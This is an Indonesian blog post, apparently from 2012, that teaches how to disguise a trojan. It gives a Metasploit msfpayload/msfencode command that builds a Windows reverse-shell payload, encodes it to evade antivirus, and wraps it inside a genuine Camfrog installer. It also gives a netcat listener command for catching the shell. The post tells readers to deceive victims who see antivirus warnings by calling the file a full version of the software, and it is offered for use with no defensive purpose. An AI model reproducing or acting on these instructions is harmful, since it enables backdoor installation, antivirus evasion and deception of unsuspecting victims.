Searching...
August 15, 2012

Don't Fuck With Metasploit

Aaaah.... Sepertinya postingan kali ini akan menuai kontroversi. Tapi tidak apa, toh saya hanya sharing, jika ada yang menggunakannya untuk kejahatan, itu tanggung jawab anda. Kali ini saya akan mengajarkan anda bagaimana caranya membuat trojan anda tersamar dengan sempurna. Ya, sangat sempurna! Jika antivirus menghalangi anda, omong kosong! Sebuah trik Social Engineering akan membawa anda dalam kesempurnaan eksploitasi.

Yang anda butuhkan hanyalah

1. Metasploit (dapat di download di sini)


How to?

1. Buat trojan sederhana, kemudian bungkus trojan dengan aplikasi yang anda inginkan.

Dalam hal ini, saya akan menggunakan file installer camfrog. Ya, siapa yang tidak tertarik dengan camfrog? Karena dengan membawa aplikasi ini, proses Social Engineering Attack (Human Hacking Art) akan lebih mudah.

Untuk membuat file trojan anda dapat menggunakan msfpayload. Sementara untuk membungkus trojan, anda bisa menggunakan msfencode.

Command :
red-dragon [~] msfpayload windows/shell_reverse_tcp LHOST=172.16.82.1 LPORT=4444 R | msfencode -a x86 -e x86/shikata_ga_nai -c 4 -t exe -x /root/camfrog.exe > /root/Desktop/camfrog.exe

Keterangan:
1. Saya akan menggunakan payload jenis windows/shell_reverse_tcp, jika sesi terbuka, maka saya langsung mendapatkan command prompt target.
2. Karena payload berjenis reverse connection, maka saya memasukan opsi LHOST dimana LHOST bernilai IP address saya.
3. LPORT adalah port yang saya gunakan untuk menerima sesi command shell.
4. Trojan ini kemudian saya encode dengan arsitektur x86 (32 bit)
5. Kemudian saya encode dengan encoder x86/shikata_ga_nai
6. Saya melakukan encode sebanyak 4 kali.
7. Kemudian output file berekstensi exe (executable file for windows)
8. Sebagai penutup kedok, saya menggunakan file camfrog.exe. Ini file asli yang saya download dari situs camfrog.
9. Kemudian hasil encoding saya simpan di Desktop dengan nama camfrog.exe


Ini file camfrog asli, yang saya gunakan untuk pembungkus trojan.


Dan ini hasil trojan yang saya buat.


Tidak ada bedanya kan? Secara ukuran dan penampilanpun, metasploit nyaris tidak membuat kecacatan dalam meniru. Namun berbeda fungsi. Kita lihat apa yang terjadi ketika file ini dieksekusi. Namun sebelumnya, anda harus melakukan aktifitas listening dengan netcat di port 4444.

Command :
red-dragon [~]  netcat -l -v -p 4444


Ketika file ini dieksekusi....


Note : Jika file terdeteksi virus, gunakan Human Hacking Art. Katakan saja ini adalah camfrog full version, mampu menonton video streaming dengan resolusi tinggi, dan bukan virus.

You are soooo
Owned by
red-dragon

0 comment:

Post a Comment

 
Back to top!